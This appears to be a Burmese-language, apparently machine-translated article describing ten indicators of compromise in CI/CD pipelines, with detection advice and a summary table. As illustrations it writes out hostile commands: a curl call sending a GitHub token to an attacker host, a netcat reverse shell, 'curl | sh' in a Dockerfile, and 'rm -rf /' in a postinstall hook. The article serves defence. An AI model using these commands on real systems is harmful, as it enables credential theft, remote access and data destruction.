မိတ်ဆက်- ဆိုက်ဘာလုံခြုံရေးတွင် အားနည်းချက်များ၏ ညွှန်ပြချက်များကား အဘယ်နည်း။
ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များသည် သင့်စနစ် သို့မဟုတ် pipeline တိုက်ခိုက်ခံနေရနိုင်ပါတယ်။ ရိုးရှင်းတဲ့ စကားလုံးတွေနဲ့ ပြောရရင် အပေးအယူ အညွှန်းကိန်းများ တိုက်ခိုက်သူတွေ ချန်ထားခဲ့တဲ့ သဲလွန်စတွေဖြစ်ပြီး ထူးဆန်းတဲ့ လက္ခဏာတွေလိုပါပဲ logins၊ ဖိုင်ပြောင်းလဲမှုများ သို့မဟုတ် ဝှက်ထားသော malware။ IOC ဆိုက်ဘာလုံခြုံရေး၎င်းတို့သည် ရာဇဝတ်မှုဖြစ်ပွားရာနေရာတွင် လက်ဗွေရာများကဲ့သို့ လုပ်ဆောင်ပြီး တစ်စုံတစ်ခု မှားယွင်းနေကြောင်း ရှင်းလင်းသော သက်သေအထောက်အထားကို ပေးပါသည်။ ထို့ကြောင့် ဆော့ဖ်ဝဲရေးသားသူများ မေးမြန်းသည့်အခါ ညှိနှိုင်းမှုရဲ့ ညွှန်ပြချက်တွေက ဘာတွေလဲအဖြေသည် ဆာဗာများ သို့မဟုတ် firewall များအတွက်သာ ကန့်သတ်ထားခြင်းမဟုတ်ဘဲ ခေတ်သစ်တွင် ဝှက်ထားသော အန္တရာယ်များလည်း ပါဝင်သည် CI/CD pipelines.
ဤမြို့ရွာ pipelines, attackers များသည် code ကို ပြောင်းလဲနိုင်သည်၊ malicious dependencies များကို inject လုပ်နိုင်သည် သို့မဟုတ် build steps များကို မသိရှိဘဲ ပြောင်းလဲနိုင်သည်။ သို့သော် လမ်းညွှန်အများစုသည် server များ သို့မဟုတ် network များကိုသာ အာရုံစိုက်နေဆဲဖြစ်သည်။ ရလဒ်အနေဖြင့် software supply chain သည် အလွယ်ကူဆုံးပစ်မှတ်များထဲမှ တစ်ခုဖြစ်လာခဲ့သည်။
ထို့ကြောင့် ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များကို ရှာဖွေခြင်း CI/CD pipelines သည် မရှိမဖြစ်လိုအပ်ပါသည်။ အထူးသဖြင့် ၎င်းသည် အဖွဲ့များအား malware များကို ပိတ်ဆို့ရန်၊ လျှို့ဝှက်ချက်များကို ကာကွယ်ရန်နှင့် software ပေးပို့မှု၏ အဆင့်တိုင်းကို လုံခြုံစေရန် ကူညီပေးပါသည်။
ညှိနှိုင်းမှု၏ ထိပ်တန်းညွှန်ပြချက် ၁၀ ခု CI/CD Pipelines
အန္တရာယ်ဖြစ်စေသော ညွှန်ပြချက်များကို ရှင်းပြသည့်အခါ စာရင်းအများစုသည် ဆာဗာများ သို့မဟုတ် ကွန်ရက်များကို အာရုံစိုက်ကြသည်။ CI/CD pipelines, attackers များသည် အလွန်ကွဲပြားသော လက်ဗွေရာများကို ချန်ထားခဲ့သည်။ ဤအချက်ပြမှုများကို မှတ်မိခြင်းသည် ကြိုတင်ကာကွယ်မှုအတွက် အရေးကြီးပါသည်။ အောက်တွင် developer နှင့် security engineer တိုင်း စောင့်ကြည့်သင့်သော IOC cybersecurity အနီရောင်အလံ ၁၀ ခု ပါရှိသည်။
၁။ သံသယဖြစ်ဖွယ် မှီခိုမှုပြောင်းလဲမှုများ
ညှိနှိုင်းမှု၏ အဓိကညွှန်ပြချက်များထဲမှ တစ်ခုမှာ pipelines သည် ရုတ်တရက် ထူးဆန်းသော dependency update တစ်ခုဖြစ်သည်။ Attacker များသည် အန္တရာယ်ရှိသော package များကို ထည့်သွင်းရန်အတွက် package manager များတွင် developer များထားရှိသည့် trust ကို အသုံးပြုလေ့ရှိသည်။
ဥပမာအားဖြင့် npm မှာ package.json ကွဲပြားမှု ရုတ်တရက် ပါဝင်နိုင်သည်-
+ "crypto-helper": "^1.0.2" ထိုသို့သောပြောင်းလဲမှုများသည် ဘေးကင်းပုံရသော်လည်း build တိုင်းထဲသို့ trojanized code ကို ထိုးသွင်းနိုင်သည်။
သက်ရောက်မှု: ခိုးယူခံရသော build များသည် malware ကို ရင်းမြစ်မှ အမွေဆက်ခံကြသည်။
ရှာဖွေတွေ့ရှိမှု: dependency reviews များကို ပြဋ္ဌာန်းပါ၊ lockfile diffs များကို ခြေရာခံပါ၊ နှင့် package အသစ်များကို အချိန်တိုင်း scan ဖတ်ပါ။
၂။ Build များတွင် ရှုပ်ထွေးနေသော ကုဒ်များ
Malware ရေးသားသူများသည် သုံးသပ်ချက်များကို ကျော်လွှားရန် ရှုပ်ထွေးမှုများကို အားကိုးကြသည်။ ရလဒ်အနေဖြင့်၊ ဤအန္တရာယ်ဖြစ်စေသော အညွှန်းကိန်းသည် CI/CD pipelines သည် ဖမ်းရအခက်ခဲဆုံးများထဲမှ တစ်ခုဖြစ်နိုင်သည်။ အမှန်စင်စစ်၊ ရှုပ်ထွေးနေသော payload များသည် open source libraries များ သို့မဟုတ် container image များထဲသို့ အသိပေးခြင်းမရှိဘဲ ခိုးဝင်သွားလေ့ရှိသည်။
ဥပမာ:
- PyPI package တစ်ခုကို အသုံးပြုထားပါတယ်
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - မလိုအပ်သော UPX binary များပါဝင်သော Docker image တစ်ခု။
- JavaScript မှာ အပြည့်အစုံပါဝင်ပါတယ်
\x41\x42အထောက်အထားခိုးယူသူများထံမှ ပုန်းအောင်းလွတ်မြောက်သည်။
သက်ရောက်မှု: Hidden code သည် build သို့မဟုတ် runtime အတွင်း တိတ်ဆိတ်စွာ လုပ်ဆောင်သောကြောင့် ၎င်းသည် IOC ဆိုက်ဘာလုံခြုံရေးတွင် အရေးကြီးသော အချက်ပြမှုတစ်ခု ဖြစ်စေသည်။
ရှာဖွေတွေ့ရှိမှု: ပေါင်းစပ် SAST encoded သို့မဟုတ် packed code ကို flag လုပ်ရန် malware scanning ဖြင့်။ အထူးသဖြင့်၊ obfuscation ကို နောက်ထပ်စုံစမ်းစစ်ဆေးသင့်သော အနီရောင်အလံတစ်ခုအဖြစ် သဘောထားပါ။
၃။ Git တွင် ဖော်ထုတ်ခံရသော လျှို့ဝှက်ချက်များ- ဂန္ထဝင် IOC ဆိုက်ဘာလုံခြုံရေးအန္တရာယ်
CI/CD pipelines သည် repositories များမှ လျှို့ဝှက်ချက်များကို တိုက်ရိုက်အမွေဆက်ခံလေ့ရှိသည်။ သို့သော်၊ Git မှာ လျှို့ဝှက်ချက်တွေ ပေါ်လာတဲ့အခါ၎င်းတို့သည် “ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များကား အဘယ်နည်း” ဟူသော မေးခွန်းအတွက် အရှင်းလင်းဆုံး အဖြေများထဲမှ တစ်ခု ဖြစ်လာသည် pipeline"S?" Git တွင် credentials များ ရောက်ရှိသွားသည်နှင့် attackers များသည် ၎င်းတို့ကို အကန့်အသတ်မရှိ exploit လုပ်နိုင်သည်။
ဥပမာ:
- A
.envပါဝင်သောဖိုင်AWS_SECRET_KEY=. - တိုကင်များ ထည့်သွင်းထားသည်
config.json. - ဖယ်ရှားပြီးနောက်ပင် Git မှတ်တမ်းတွင် လျှို့ဝှက်ချက်များကို မြင်နေရဆဲဖြစ်သည်။
သက်ရောက်မှု: ပေါ်ထွက်နေတဲ့ key တွေက တိုက်ခိုက်သူတွေကို တိုက်ရိုက်ဝင်ရောက်ခွင့်ပေးပါတယ် CI/CD pipelines၊ cloud စနစ်များ သို့မဟုတ် ဒေတာဘေ့စ်များ။ ထို့ကြောင့် ၎င်းသည် ညှိနှိုင်းမှု၏ အန္တရာယ်အရှိဆုံး ညွှန်ပြချက်များထဲမှ တစ်ခုဖြစ်သည်။
ရှာဖွေတွေ့ရှိမှု: အသုံး pre-commit hooks နှင့် လျှို့ဝှက်စကင်ဖတ်ရန်အတွက် CI အလုပ်များ၊ ပေါက်ကြားနေသော သော့များကို ချက်ချင်းရုပ်သိမ်းပါ။ ထို့အပြင်၊ ထိတွေ့မှုကာလများကို လျှော့ချရန် အလိုအလျောက်ပြုပြင်မှုကို ပြဋ္ဌာန်းပါ။
၄။ ခိုးဝှက်ထားသည် Pipeline ဖွဲ့စည်းပုံများ- အားနည်းချက်များ၏ ဖုံးကွယ်ထားသော ညွှန်ပြချက်များ
Pipeline config များသည် တန်ဖိုးမြင့်ပစ်မှတ်များဖြစ်သောကြောင့် တစ်ကြိမ်တည်းသော ပြုပြင်မွမ်းမံမှုသည် လုပ်ငန်းစဉ်တစ်ခုလုံးကို မကြာခဏ ဖျက်ဆီးပစ်လေ့ရှိသည်။။ထို့ကြောင့် လိမ်လည်လှည့်ဖြားမှု pipeline ဖိုင်များသည် ရိုးရာစောင့်ကြည့်ရေးကိရိယာများ ရှားရှားပါးပါးသာ တွေ့ရှိနိုင်သော အဓိက IOC ဆိုက်ဘာလုံခြုံရေးအန္တရာယ်တစ်ခုဖြစ်သည်။
ဥပမာ:
GitHub လုပ်ဆောင်ချက်များတွင်-
- run: curl -X POST http://attacker[.]com --data $GITHUB_TOKEN- GitLab မှာ- အန္တရာယ်ရှိတဲ့ အလုပ်တစ်ခုကို ထည့်သွင်းထားပါတယ်
.gitlab-ci.ymlအရေးကြီးဒေတာများကို စွန့်ပစ်သည်။ - ဂျန်ကင်းစ်တွင်-
sh "nc -e /bin/bash attacker.com 4444".
သက်ရောက်မှု: ဤအတည်မပြုရသေးသော ပြောင်းလဲမှုများသည် သင့်အား ပြောင်းလဲစေသည် pipeline တိုက်ခိုက်သူများအတွက် အမြဲတမ်း backdoor ထဲသို့ ဝင်ရောက်သွားပြီး၊ ၎င်းသည် ညှိနှိုင်းမှု၏ ညွှန်ပြချက်တစ်ခုအဖြစ် ရှင်းရှင်းလင်းလင်း ရေတွက်နိုင်သည်။
ရှာဖွေတွေ့ရှိမှု: လက်မှတ်ရေးထိုးထားသော config များကို ပြဋ္ဌာန်းပါ၊ PR ခွင့်ပြုချက်များ လိုအပ်ပါ၊ နှင့် မမျှော်လင့်ထားသော အလုပ်များကို စောင့်ကြည့်ပါ။ ထို့အပြင်၊ သတ်မှတ်ပါ guardrails ပြောင်းလဲထားသော workflow များကို အလိုအလျောက် ပိတ်ဆို့ပေးသည်။
5. အခွင့်ထူးခံ IaC ပုံသေ
အခြေခံအဆောက်အအုံ အဓိပ္ပာယ်ဖွင့်ဆိုချက်များ မှားယွင်းစွာ ပြင်ဆင်သတ်မှတ်ခြင်းသည် မကြာခဏ ဖုံးကွယ်ထားသော backdoor များကို ဖန်တီးပေးပါသည်။ ရလဒ်အနေဖြင့်၊ privileged default များသည် IaC တို့သည် IOC ဆိုက်ဘာလုံခြုံရေးအန္တရာယ် တစ်ခုဖြစ်သည်။
ဥပမာ:
- Kubernetes ဖြန့်ကျက်ခွင့်ပြုသည့် pods များ
privileged: true. - Helm ဇယားများသည် ဝန်ဆောင်မှုများကို ဖော်ထုတ်ပြသသည်
0.0.0.0:22.
သက်ရောက်မှု: တိုက်ခိုက်သူများသည် root-level access ရရှိကြသည် သို့မဟုတ် internal service များကို လူသိရှင်ကြား ဖော်ထုတ်ကြသည်။ ထို့ကြောင့် ဤပြဿနာများသည် တိုက်ခိုက်မှုမျက်နှာပြင်ကို သိသိသာသာ ကျယ်ပြန့်စေသည်။
ရှာဖွေတွေ့ရှိမှု: Apply IaC ပေါင်းစည်းခြင်းမပြုမီ အနည်းဆုံးအခွင့်ထူးကို ပြဋ္ဌာန်းရန် စကင်ဖတ်စစ်ဆေးပါ။ ထို့အပြင်၊ ဖွဲ့စည်းမှုတိုင်းကို ပြန်လည်သုံးသပ်ခြင်း၏ တစ်စိတ်တစ်ပိုင်းအဖြစ် သေချာပါစေ။ pipeline.
၆။ ပုံမှန်မဟုတ်သော တည်ဆောက်မှု အပြုအမူများ
တိုက်ခိုက်သူများသည် မကြာခဏ ပြောင်းလဲလေ့ရှိသည် pipeline အပြုအမူကို မကောင်းသော လုပ်ရပ်များထဲသို့ ချော်လဲစေပါသည်။ တစ်နည်းအားဖြင့်ဆိုရသော် ပုံမှန်မဟုတ်သော တည်ဆောက်မှုလုပ်ဆောင်ချက်သည် ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များကား အဘယ်နည်းဆိုသည့် အရှင်းလင်းဆုံးအဖြေများထဲမှ တစ်ခုဖြစ်သည် CI/CD pipelines.
ဥပမာ:
- ထူးဆန်းသော domain များသို့ outbound network request များပြုလုပ်နေသော build များ။
- Node.js ပရောဂျက်တစ်ခုသည် PowerShell ကို ရုတ်တရက် ထုတ်ပေးသည်
npm install. - build script များတွင် သတ်မှတ်ထားခြင်းမရှိသော binary ကြီးများကို ဒေါင်းလုဒ်လုပ်နေသော CI အလုပ်တစ်ခု။
သက်ရောက်မှု: အားနည်းချက်ရှိသော build များသည် malware ဖြန့်ဖြူးရေးနေရာများအဖြစ် လုပ်ဆောင်နိုင်သည်။ အထူးသဖြင့် ၎င်းတို့သည် အန္တရာယ်ရှိသော payload များကို ဖြန့်ကျက်မှုတိုင်းတွင် ပျံ့နှံ့စေသည်။
ရှာဖွေတွေ့ရှိမှု: မမျှော်လင့်ထားသော လုပ်ငန်းစဉ်များ သို့မဟုတ် ချိတ်ဆက်မှုများ ရှိမရှိ တည်ဆောက်မှုမှတ်တမ်းများကို စောင့်ကြည့်ပါ။ ထို့အပြင်၊ ပုံမှန်မဟုတ်သော အပြုအမူများကို အလံပြရန် ပုံမှန်မဟုတ်သော ထောက်လှမ်းမှုကို ပြင်ဆင်သတ်မှတ်ပါ။
၇။ IOC ဆိုက်ဘာလုံခြုံရေးအန္တရာယ်များအဖြစ် အန္တရာယ်ရှိသော Package Script များ
Package manager များသည် သက်တမ်းစက်ဝန်းကို ပံ့ပိုးပေးသည် hooks တိုက်ခိုက်သူများ အသုံးချသော အားနည်းချက်များ။ ထို့ကြောင့် npm၊ PyPI သို့မဟုတ် Dockerfiles ရှိ အန္တရာယ်ရှိသော script များသည် အန္တရာယ်ကျရောက်မှု၏ အားကောင်းသော ညွှန်ပြချက်များဖြစ်သည်။
ဥပမာ:
- npm:
postinstallscript ကို လုပ်ဆောင်နေသည်rm -rf /သို့မဟုတ် C2 သို့ အချက်ပြခြင်း။ - PyPI:
setup.pyinstall လုပ်တဲ့အခါ ဝှက်ထားတဲ့ Python ကုဒ်ကို execute လုပ်ပါ။ - Docker ဖိုင်:
RUN curl attacker.sh | sh.
သက်ရောက်မှု: တိုက်ခိုက်မှုသည် runtime testing မတိုင်မီ installation လုပ်နေစဉ်အတွင်း လုပ်ဆောင်သည်။ ထို့ကြောင့် developer များသည် အချိန်နောက်ကျသွားမှသာ သိရှိနိုင်မည်ဖြစ်သည်။
ရှာဖွေတွေ့ရှိမှု: ထည့်သွင်းမှု script များအတွက် package manifest များကို စကင်ဖတ်ပါ။ ထို့အပြင်၊ အန္တရာယ်ရှိသော အချက်အလက်များကို ကန့်သတ်ပါ။ hooks in CI/CD ထိတွေ့မှုကို လျှော့ချရန် အလုပ်အကိုင်များ။
၈။ မှတ်ပုံတင်ခြင်း အဆိပ်သင့်ခြင်း၏ ညွှန်ပြချက်များ
တိုက်ခိုက်သူများသည် မှတ်ပုံတင်ထားသော ရှေးဟောင်းပစ္စည်းများကို အစားထိုး သို့မဟုတ် ပြုပြင်မွမ်းမံကြပြီး ဤဖြစ်ရပ်များသည် ထောက်ပံ့ရေးကွင်းဆက်တွင် အားနည်းချက်များ၏ ညွှန်ပြချက်များ၏ စာအုပ်ဥပမာများဖြစ်သည်။ pipelines.
ဥပမာ:
- Docker image tag တစ်ခုသည် trojanized layer ဖြင့် တိတ်တဆိတ် update လုပ်ထားသည်။
- အတွင်းပိုင်းထုပ်ပိုးမှုကို အဆိပ်ခတ်ထားသော ဗားရှင်းဖြင့် အစားထိုးထားသည်။
- npm namespace squatting လိုမျိုး
lodash-proxy.
သက်ရောက်မှု: registry artifact ကို အသုံးပြုတဲ့ build တိုင်းဟာ အန္တရာယ်ကျရောက်ပါတယ်။ ဒါတင်မကဘဲ၊ အန္တရာယ်ကျရောက်မှုဟာ downstream service တွေဆီကိုပါ ပျံ့နှံ့သွားပါတယ်။
ရှာဖွေတွေ့ရှိမှု: မှတ်ပုံတင်ထားသော အချက်အလက်များအားလုံးကို လက်မှတ်ရေးထိုးခြင်းနှင့် သမာဓိစစ်ဆေးမှုများကို ပြဋ္ဌာန်းပါ။ ထို့အပြင်၊ ရှေးဟောင်းပစ္စည်း၏ မူလအစကို ခြေရာခံပါ SBOM အတည်ပြုချက်။
၉။ IOC အထောက်အထားအဖြစ် ပုံမှန်မဟုတ်သော အသုံးပြုသူလုပ်ဆောင်ချက်
ခိုးယူခံရသောအကောင့်များသည် ပုံမှန်မဟုတ်သော အရိပ်အယောင်များကို အမြဲလိုလို ချန်ထားခဲ့သည်။ ထို့ကြောင့်၊ ပုံမှန်မဟုတ်သော ဆော့ဖ်ဝဲရေးသားသူ အပြုအမူသည် ညှိနှိုင်းမှု၏ ခိုင်မာသော ညွှန်ပြချက်တစ်ခုဖြစ်သည်။
ဥပမာ:
- Commitဒေသစံတော်ချိန် နံနက် ၃ နာရီတွင် ရွှေ့ဆိုင်းခဲ့သည်။
- အားလပ်ရက်တွင် အကောင့်များမှ PR အတည်ပြုချက်များ။
- Pipelineပုံမှန်မဟုတ်သော ကြိမ်နှုန်းဖြင့် လှုံ့ဆော်ပေးပါသည်။
သက်ရောက်မှု: တိုက်ခိုက်သူများသည် ခိုးယူထားသော အထောက်အထားများကို အလွဲသုံးစားပြု၍ မကောင်းသောပြောင်းလဲမှုများကို ထည့်သွင်းကြသည်။ အဆုံးတွင်၊ ခွင့်ပြုချက်မရှိဘဲ commitပုံမှန်လုပ်ငန်းဆောင်တာများနှင့် အလွယ်တကူ ရောနှောနိုင်သည်။
ရှာဖွေတွေ့ရှိမှု: စောငျ့ရှောကျ SCM မူမမှန်မှုများအတွက် လုပ်ဆောင်ခြင်း၊ MFA ကို ပြဋ္ဌာန်းခြင်းနှင့် တိုကင်များကို မှန်မှန်လှည့်ပတ်ခြင်း။ ထို့အပြင်၊ သံသယဖြစ်ဖွယ်ကိစ္စများတွင် သတိပေးချက် commit သို့မဟုတ် အတည်ပြုချက်ပုံစံများ။
၁၀။ IOC ဆိုက်ဘာလုံခြုံရေးတွင် သမာဓိ သို့မဟုတ် လက်မှတ်စစ်ဆေးမှုများ မအောင်မြင်ခဲ့ပါ။
အဖြစ်များပေမယ့် လျစ်လျူရှုထားခံရတဲ့ ညှိနှိုင်းမှု၏ညွှန်ပြချက် သည် မှန်ကန်မှု သို့မဟုတ် လက်မှတ်စစ်ဆေးမှု မအောင်မြင်ပါ။ IOC ဆိုက်ဘာလုံခြုံရေးတွင်၊ ဤစစ်ဆေးမှုများသည် ကုဒ် သို့မဟုတ် artifacts များသည် စစ်မှန်ကြောင်း အတည်ပြုသည်။ ၎င်းတို့ကို ကျော်သွားခြင်းသည် ထွက်ခွာသွားသည်။ pipelineဖော်ထုတ်ခံရသည်။
ဥပမာ:
- SHA256 hash သည် မျှော်လင့်ထားသော checksum နှင့် မကိုက်ညီပါ။
- GPG လက်မှတ် ပျောက်ဆုံးနေ သို့မဟုတ် မမှန်ကန်ပါ။
- An SBOM လက်မှတ်မထိုးထားသော ရှေးဟောင်းပစ္စည်းများကို ပြသထားသည်။
သက်ရောက်မှု: Integrity ချို့ယွင်းမှုများသည် များသောအားဖြင့် ခိုးဝှက်လုပ်ဆောင်ခြင်း၊ registry အဆိပ်သင့်ခြင်း သို့မဟုတ် malware ထိုးသွင်းခြင်းတို့ကို ဆိုလိုပါသည်။
ရှာဖွေတွေ့ရှိမှု: လက်မှတ်စစ်ဆေးမှုများကို အလိုအလျောက်လုပ်ဆောင်ပါ၊ checksum အတည်ပြုချက်ကို ပြဋ္ဌာန်းပါ၊ လက်မှတ်မထိုးထားသော အစိတ်အပိုင်းများကို ပိတ်ဆို့ပါ။ အဓိကအားဖြင့်၊ မအောင်မြင်သော စစ်ဆေးမှုတိုင်းကို ညှိနှိုင်းမှု၏ ရှင်းလင်းသော သက်သေအဖြစ် သဘောထားပါ။
CI/CD တစ်ချက်ကြည့်လိုက်ရုံဖြင့် ညှိနှိုင်းမှု၏ လက္ခဏာများ
| ညှိနှိုင်းမှုညွှန်ပြချက် (IOC) | သက်ရောက်မှု CI/CD Pipelines | ဘယ်လိုထောက်လှမ်းမလဲ။ |
|---|---|---|
| သံသယဖြစ်ဖွယ် မှီခိုမှုပြောင်းလဲမှုများ | တိုက်ခိုက်သူများသည် package manager များထဲသို့ malicious libraries များ ထိုးသွင်းပြီး build များကို ခိုးယူခံရစေပါသည်။ | lockfile diffs များကို ခြေရာခံပါ၊ dependency reviews များကို ပြဋ္ဌာန်းပါ၊ နှင့် dependencies များကို စဉ်ဆက်မပြတ် scan ဖတ်ပါ။ |
| Build များတွင် ရှုပ်ထွေးနေသော ကုဒ်များ | ဝှက်ထားသော payloads များသည် builds သို့မဟုတ် runtime အတွင်း ထောက်လှမ်းခြင်းမရှိဘဲ လုပ်ဆောင်သည်။ | အသုံး SAST နှင့် base64၊ hex သို့မဟုတ် packed code pattern များကို flag လုပ်ရန် malware scanning လုပ်ခြင်း။ |
| Git မှာ လျှို့ဝှက်ချက်တွေ ဖော်ထုတ်ခံရ | ပေါက်ကြားလာသော တိုကင်များ သို့မဟုတ် API key များသည် တိုက်ခိုက်သူများအား အရေးကြီးသောစနစ်များသို့ တိုက်ရိုက်ဝင်ရောက်ခွင့်ပေးသည်။ | Git မှာ လျှို့ဝှက်စကင်န်ဖတ်မှုတွေကို လုပ်ဆောင်ပါ hooks နှင့် ပေါက်ကြားလာသော အထောက်အထားများကို အလိုအလျောက် ရုပ်သိမ်းပါသည်။ |
| ခိုးဝှက်ထားသည် Pipeline configurations | ပြုပြင်ထားသော workflow များသည် ဒေတာများကို ထုတ်ယူခြင်း သို့မဟုတ် အတွင်း၌ ကြာရှည်ခံခြင်းကို ခွင့်ပြုသည် CI/CD. | PR ခွင့်ပြုချက်များ လိုအပ်ခြင်း၊ လက်မှတ်ရေးထိုးထားသော config များကို ပြဋ္ဌာန်းခြင်းနှင့် စောင့်ကြည့်ခြင်း pipeline အပြောင်းအလဲများကို။ |
| အခွင့်ထူး IaC ပုံသေ | အလွန်အကျွံခွင့်ပြုထားသော အခန်းကဏ္ဍများ သို့မဟုတ် မလုံခြုံသော မူရင်းများသည် cloud ပတ်ဝန်းကျင်များကို ဖော်ထုတ်ပါသည်။ | အနည်းဆုံး အခွင့်ထူး ပြဋ္ဌာန်းချက်အတွက် Terraform၊ Kubernetes နှင့် Helm ဖိုင်များကို စကင်ဖတ်ပါ။ |
| ပုံမှန်မဟုတ်သော တည်ဆောက်မှု အပြုအမူများ | Pipelinemalware ဖြန့်ဖြူးရေးနေရာများအဖြစ် သို့မဟုတ် ဘေးတိုက်ရွေ့လျားမှုအတွက် အသုံးပြုသည်။ | မမျှော်လင့်ထားသော ဒေါင်းလုဒ်များ၊ လုပ်ငန်းစဉ်များ သို့မဟုတ် အထွက်ခေါ်ဆိုမှုများအတွက် တည်ဆောက်မှုမှတ်တမ်းများကို ခွဲခြမ်းစိတ်ဖြာပါ။ |
| အန္တရာယ်ရှိသော Package Script များ | ဝှက်ထားသော install မလုပ်မီ/ထည့်သွင်းပြီးနောက် script များသည် runtime testing မတိုင်မီ payload များကို လှုံ့ဆော်ပေးသည်။ | အန္တရာယ်များသော npm/PyPI script များကို ပိတ်ဆို့ပြီး execution ကို ကန့်သတ်ပါ။ CI/CD အလုပ်အကိုင်အခွင့်အ။ |
| မှတ်ပုံတင်အဆိပ်သင့်ခြင်း | Trojanized artifacts များသည် registry ရှိ ယုံကြည်ရသော image များ သို့မဟုတ် binaries များကို အစားထိုးသည်။ | checksum များကို အတည်ပြုပါ၊ signature validation ကို ပြဋ္ဌာန်းပါ၊ နှင့် registry များကို ကြိုတင်စကင်ဖတ်ပါ။ |
| ပုံမှန်မဟုတ်သော အသုံးပြုသူ လုပ်ဆောင်ချက် | ခိုးယူခံရသောအကောင့်များသည် အန္တရာယ်ရှိသော ရည်ရွယ်ချက်ဖြင့် တွန်းအားပေးသည် commits သို့မဟုတ် trigger pipelines. | MFA ကို ပြဋ္ဌာန်းပြီး စောင့်ကြည့်ပါ commitပုံမှန်မဟုတ်မှုများအတွက် s များနှင့် ခွဲခြမ်းစိတ်ဖြာပါ login ပုံစံများ။ |
| သမာဓိ သို့မဟုတ် လက်မှတ်စစ်ဆေးမှုများ မအောင်မြင်ခဲ့ပါ။ | ဝင်ရောက်နေသော ကုဒ်၊ မှီခိုမှုများ သို့မဟုတ် ရုပ်ပုံများကို ညွှန်ပြသည် pipeline. | သမာဓိစစ်ဆေးမှုများကို အလိုအလျောက်လုပ်ဆောင်ပြီး လက်မှတ်မထိုးထားသော သို့မဟုတ် မကိုက်ညီသော အစိတ်အပိုင်းများကို ပိတ်ဆို့ပါ။ |
ရိုးရာ IOC ဆိုက်ဘာလုံခြုံရေး ဘာကြောင့် လွဲချော်နေရတာလဲ။ CI/CD အန္တရာယ်များ
အဖွဲ့အစည်းအများစုသည် ဆာဗာများ၊ ကွန်ပျူတာများ သို့မဟုတ် ကွန်ရက်များပေါ်ရှိ အန္တရာယ်ဖြစ်စေသော ညွှန်ပြချက်များကို စောင့်ကြည့်ပြီးဖြစ်သည်။ သို့သော် IOC ဆိုက်ဘာလုံခြုံရေးအတွက် ဤဂန္ထဝင်ချဉ်းကပ်မှုသည် CI/CD pipelines တွေဟာ အခုအချိန်မှာ အရေးအကြီးဆုံး တိုက်ခိုက်မှု မျက်နှာပြင်တွေထဲက တစ်ခုပါ။ တကယ်တော့၊ pipelineရိုးရာကိရိယာများ မသိရှိနိုင်သော ထူးခြားသော ညှိနှိုင်းမှု အချက်ပြမှုများကို ပြသသည်။
ရိုးရာလုံခြုံရေးတွင် ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များ
ရိုးရာ IOC ဆိုက်ဘာလုံခြုံရေးတွင်၊ အဓိကထားလေ့ရှိသည်မှာ-
- ထူးဆန်းသော logins သို့မဟုတ် ခိုးယူခံရသော အထောက်အထားများကို အကြံပြုသည့် IP လိပ်စာများ။
- malware ကိုဖော်ပြသည့် သံသယဖြစ်ဖွယ်ဖိုင် hash များ သို့မဟုတ် registry ပြောင်းလဲမှုများ။
- ဒေတာခိုးယူမှုကို ညွှန်ပြသည့် မမျှော်လင့်ထားသော ထွက်သွားသည့် အသွားအလာ။
၎င်းတို့သည် လူသိများသော အညွှန်းကိန်းများဖြစ်ပြီး ၎င်းတို့တွင်လည်း ခြေရာခံထားသည်- MITER ATT&CK မူဘောင်၊ ၎င်းသည် ရန်သူ၏ အဖြစ်များသော အပြုအမူများနှင့် နည်းဗျူဟာများကို မြေပုံဆွဲပေးသည်။ ၎င်းတို့သည် အသုံးဝင်သော အချက်ပြမှုများဖြစ်သည်။ သို့သော် ၎င်းတို့သည် အဓိကအားဖြင့် လည်ပတ်မှုစနစ်များ သို့မဟုတ် ကော်ပိုရိတ်ကွန်ရက်များနှင့် သက်ဆိုင်သည်။ ရလဒ်အနေဖြင့် ၎င်းတို့သည် ဆော့ဖ်ဝဲလ်ထောက်ပံ့ရေးကွင်းဆက်တွင် အစောပိုင်းတွင် ဖြစ်ပေါ်လေ့ရှိသော သိမ်မွေ့သော ခိုးယူမှုများကို လွတ်သွားစေသည်။
အဘယ်ကြောင့် CI/CD Pipeline၎
CI/CD pipelines များသည် developer များရှိသည့် အလိုအလျောက်ပတ်ဝန်းကျင်များဖြစ်သည် commit code၊ pull dependencies နှင့် release builds များ။ တိုက်ခိုက်သူများသည် ဤနေရာတွင် ညှိနှိုင်းမှုတစ်ခုသည် ဖြန့်ကျက်မှုတိုင်းတွင် အဆင့်ဆင့်ဖြစ်ပေါ်လေ့ရှိကြောင်း သိရှိကြသည်။ ထို့ကြောင့်၊ ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များကား အဘယ်နည်း။ CI/CD pipelines? သူတို့က အရမ်းကွာခြားပုံရတယ်-
- package.json သို့မဟုတ် requirements.txt တွင် တိတ်တဆိတ်ထည့်သွင်းထားသော အန္တရာယ်ရှိသော မှီခိုမှုတစ်ခု။
- Git တွင် API key များ သို့မဟုတ် token များ ဖော်ထုတ်ခံရခြင်း commits သို့မဟုတ် .env ဖိုင်များ။
- ရှုပ်ထွေးနေသော ကုဒ်ကို npm သို့မဟုတ် PyPI package များထဲသို့ ထိုးသွင်းထားသည်။
- Terraform သို့မဟုတ် Kubernetes ဖိုင်များသည် privileged: true ကဲ့သို့သော မလုံခြုံသော default များပါရှိသည်။
- Pipeline ဒေတာများကို ထုတ်ယူရန် သို့မဟုတ် backdoor များကို ဖွင့်ရန် တည်းဖြတ်ထားသော အလုပ်များ။
ဤအပေးအယူလုပ်မှု လက္ခဏာများ CI/CD မမြင်ရအောင်နေ standard လုံခြုံရေးကိရိယာများ။
IOC ဆိုက်ဘာလုံခြုံရေးတွင် ကွာဟချက်
